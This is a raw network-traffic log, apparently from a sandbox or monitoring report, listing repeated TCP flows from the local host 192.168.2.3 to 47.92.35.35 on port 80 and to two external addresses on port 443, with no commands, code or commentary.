Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80

Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
